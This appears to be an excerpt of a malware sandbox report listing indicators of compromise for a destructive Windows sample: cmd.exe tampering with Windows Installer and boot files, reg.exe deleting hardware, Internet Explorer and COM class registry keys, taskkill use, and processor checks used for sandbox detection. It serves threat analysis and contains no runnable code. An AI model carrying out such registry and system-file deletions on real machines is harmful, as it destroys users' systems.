File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PR8CA8~1.DLL	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\SYSTEM~2	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\SYSTEM~4.DLL	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\UIAUTO~3.DLL	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\UI9BD8~1.DLL	cmd.exe
File created	C:\Windows\Windows\System32\LogonUI.exe	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0000000010\9.0.0\UL_MSV~1.98C	cmd.exe
File opened for modification	C:\Windows\Installer\2e30.msp	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\SYSTEM~1	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\SYDE67~1.DLL	cmd.exe
File opened for modification	C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-A90000000001}\PDFFIL~1.ICO	cmd.exe
File opened for modification	C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-A90000000001}\PDXFIL~1.ICO	cmd.exe
File opened for modification	C:\Windows\Installer\5094.msp	cmd.exe
File opened for modification	C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\grvicons.exe	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PRESEN~2.DLL	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\UIAUTO~3	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\WPFGFX~1.DLL	cmd.exe
File opened for modification	C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-A90000000001}\RMFFIL~1.ICO	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\1D5E3C0FEDA1E123187686FED06E995A\10.0.40219\F_B2C0~1	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\1D5E3C0FEDA1E123187686FED06E995A\10.0.40219\F_3369~1	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PENIMC~4.DLL	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PRESEN~1	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PRESEN~3	cmd.exe
File opened for modification	C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-A90000000001}\XDPFIL~1.ICO	cmd.exe
File created	C:\Windows\Boot\EFI\*	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\MICROS~2.DLL	cmd.exe
File opened for modification	C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\misc.exe	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\00004109110000000000000000F01FEC\14.0.4763\INKDIV~1.8F0	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\1926E8D15D0BCE53481466615F760A7F\10.0.40219\F_8C6C~1	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\MICROS~1.DLL	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PRESEN~3.DLL	cmd.exe
File opened for modification	C:\Windows\Installer\{90140000-002A-0000-1000-0000000FF1CE}\ShellUI.MST	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\1926E8D15D0BCE53481466615F760A7F\10.0.40219\F_FCCC~1	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PRESEN~4.DLL	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\UIAUTO~4	cmd.exe
File opened for modification	C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-A90000000001}\APIFIL~1.ICO	cmd.exe
File opened for modification	C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-A90000000001}\SC_REA~1.EXE	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PE3AC5~1.DLL	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\SYSTEM~4	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\SY2C2F~1.DLL	cmd.exe
File opened for modification	C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\cagicon.exe	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PENIMC~3.DLL	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PRESEN~2.MUI	cmd.exe
File opened for modification	C:\Windows\Installer\1b67.msp	cmd.exe
File opened for modification	C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\pubs.exe	cmd.exe
File opened for modification	C:\Windows\Installer\{90140000-006E-0409-0000-0000000FF1CE}\misc.exe	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\1926E8D15D0BCE53481466615F760A7F\10.0.40219\F_BB64~1	cmd.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe

Enumerates system info in registry 2 TTPs 64 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

2880 taskkill.exe
2044 taskkill.exe
2800 taskkill.exe

pid	process
2880	taskkill.exe
2044	taskkill.exe
2800	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{8856F961-340A-11D0-A96B-00C04FD705A2}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{8D670533-270B-4549-B19B-414FB9C6EBDB}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\NSCSINGLEEXPAND	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IGNORE_XML_PROLOG	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{0002000D-0000-0000-C000-000000000046}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{DF0B3D60-548F-101B-8E65-08002B2BD119}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\CACHE_FLUSH	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{1FBA04EE-3024-11d2-8F1F-0000F87ABD16}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{809B6661-94C4-49E6-B6EC-3F0F862215AA}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{03D9F3F2-B0E3-11D2-B081-006008039BF0}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mpeg	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\MSN	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{314111C6-A502-11D2-BBCA-00C04F8EC294}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{69AD90EF-1C20-11d1-8801-00C04FC29D46}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{CAAFDD83-CEFC-4E3D-BA03-175F17A24F91}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{D256B2D9-9C58-445A-8C38-C3AAA84EF137}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\RunDLl32Policy\cnmsm7a.dll	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C3C9CB67-F453-479A-9AB0-94AE65F2EB2F}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C46C1BCE-3C52-11D0-9200-848C1D000000}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{5AA2BA46-9913-4DC7-9620-69AB0FA17AE7}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\UnattendBackup\ActiveSetup\FavoritesDelete	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extension Compatibility\{AA58ED58-01DD-4D91-8333-CF10577473F7}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{3D6A1A85-DE54-4768-9951-053B3B02B9B0}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8cec58ae-07a1-11d9-b15e-000d56bfe6ee}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{0F1BE7F8-45CA-11D2-831F-00A0244D2298}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\RunDLl32Policy\cnmsm57.dll	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{055CB2D7-2969-45CD-914B-76890722F112}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{6B7F1602-D44C-11d0-A7D9-AE3D17000000}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{D1AAC408-B6BB-46FB-9654-50816C21433D}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{A7866636-ED52-4722-82A9-6BAABEFDBF96}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extension Compatibility\{EAEE5C74-6D0D-4ACA-9232-0DA4A7B866BA}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FC88B53C-9B2A-1A25-5867-C8612E79DBF6}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{1AA06BA1-0E88-11d1-8391-00C04FBD7C09}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{466d66fa-9616-11d2-9342-0000f875ae17}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{B283E214-2CB3-11D0-ADA6-00400520799C}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Capabilities\Roaming\PrivacyAdvanced	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BEHAVIORS	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\Restriction Policies\Hashes\DE9132D488A64BA12FC5570359923764E37A50A6	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{78A9B22E-E0F4-11D0-B5DA-00C0F00AD7F8}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{60178279-6D62-43AF-A336-77925651A4C6}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{62CEC9E0-3811-4C36-A94E-4F7565DCD23F}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{E5DF9D10-3B52-11D1-83E8-00A0C90DC849}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\InformationCard Token Provider	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{598eba02-b49a-11d2-a1c1-00609778ea66}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{EFEE43D6-BFE5-44B0-8063-AC3B2966AB2C}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{29CF293A-1E7D-4069-9E11-E39698D0AF95}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{C46C1BDC-3C52-11D0-9200-848C1D000000}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{054aae20-4bea-4347-8a35-64a533254a9d}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\NSCSINGLEEXPAND	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{4E7BD74F-2B8D-469E-8CB2-BC60BB9AAE22}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{7057e952-bd1b-11d1-8919-00c04fc2c836}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\DNT	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{D986FE4B-AE67-43C8-9A89-EADDEA3EC6B6}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{4F720B9C-24B1-4948-A035-8853DC01F19E}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CA8A9780-280D-11CF-A24D-444553540000}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{ECDB03D2-6E99-11d2-875F-00A0C93C09B3}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8FE2181-CAE7-49EE-9B04-DB7EB4DA544A}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Plugins\PluginsPageFriendlyName	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extension Compatibility\{4A7C84E2-E95C-43C6-8DD3-03ABCD0EB60E}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extension Compatibility\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\RunDLl32Policy\cnmsm6d.dll	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{2a6eb050-7f1c-11ce-be57-00aa0051fe20}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{6B7E638F-850A-101B-AFC0-4210102A8DA7}	reg.exe

Modifies registry class 64 IoCs

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{75D01070-1234-44E9-82F6-DB5B39A47C13}\DefaultExtension	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1CFEA72A-8DA8-4403-A287-3C3B5ADFEA10}\TypeLib	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D8BD090D-3F39-45FD-B29A-7FC62C2E59C3}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\EntityDataProvider.EntityDataProvider.1	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2B1ED848-4ABB-11D3-A601-00105A0D058F}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{37B3B0B1-44B5-11D3-B65B-00C04F8EF32D}\ProxyStubClsid	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2660212B-070F-40D3-AFC1-1EC7DF0A995D}\NumMethods	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8ECB4C65-F7D7-11D4-B8E9-0050DACD1F75}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.aif\OpenWithProgIds	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0017-ABCDEFFEDCBA}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{50F4AA22-3684-4837-AB29-9485F697A0D1}\NumMethods	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{F3AE6A1B-BB9F-3258-AAB9-87D6BAF4C3A3}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{31B09710-EADC-11CD-B9F7-00AA004753B5}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{F7041E23-1A6C-41BB-89B2-B3425C51CCD5}\NumMethods	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B7497CA8-B458-448C-B0B5-E90E48EAA8C9}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{D1788312-EDEE-4673-AE33-B3C3BC0753EA}\14.0.0.0	reg.exe
